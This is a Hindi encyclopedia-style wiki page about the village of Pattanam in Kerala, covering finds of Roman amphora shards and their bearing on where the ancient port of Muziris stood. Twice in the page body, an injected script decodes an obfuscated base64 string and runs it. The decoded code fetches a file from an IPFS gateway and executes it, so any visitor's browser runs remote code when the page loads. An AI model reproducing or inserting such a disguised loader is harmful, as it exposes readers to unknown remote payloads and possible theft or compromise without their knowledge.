पत्तनम

भारत डिस्कवरी प्रस्तुति
अवनी (चर्चा | योगदान) द्वारा परिवर्तित 07:14, 8 अक्टूबर 2011 का अवतरण
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
  • दक्षिण भारत में स्थित केरल के एर्नाकुलम ज़िले में पत्तनम नामक गाँव स्थित है।
  • उत्खनन में यहाँ से मिट्टी के जार के टुकड़े मिले हैं, जिनके बारे में अनुमान है कि ये प्रसिद्ध इतालवी सुराही शिल्पकला के नमूने हैं।
  • क़रीब 2000 साल पहले ऐसी सुराहियों में रोमन लोग शराब और जैतून का तेल रखा करते थे।
  • वर्ष 2003-2004 में केरल इतिहास व अनुसंधान परिषद् और इंस्टीट्यूट ऑफ़ हेरिटेज के नेतृत्व की यह पुरातात्विक खोज भारत के पश्चिमी तट के नगरों का सबूत उपलब्ध कराती है।
  • इस खोज से मालाबार तट के पास पहली सदी के विख्यात नदी बंदरगाह मुजरिस के पेरियार नदी के किनारे कोडुंगालुर में स्थित होने की अवधारणा को चुनौती मिलती है।
  • मुजरिस से यूनानी रोमन व्यापारियों के काली मिर्च और दालचीनी के व्यापार का ज़िक्र रोमन नौ सैनिक अधिकारी प्लिनी द एल्डर, अलेक्जेंड्रिया के भूगोलविद् टॉलेमी के दस्तावेजों के साथ-साथ तमिल संगम साहित्य में भी मिलता है।
  • इस स्थल की खुदाई के दौरान बहुमूल्य नग इत्यादि मिले हैं।
  • रोमन जार लाल-काली मिट्टी से ई.पू. पहली सदी से 78 ई.तक बनते थे।
  • विसुवियत पर्वत से लावा निकलने के बाद ये कभी नहीं बने।
  • ऐसा माना जाता है कि ये बर्तन खाड़ी देशों से भारत पहुँचे होंगे,जो पहली बार भारत में पत्तनम में पाये गए हैं।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख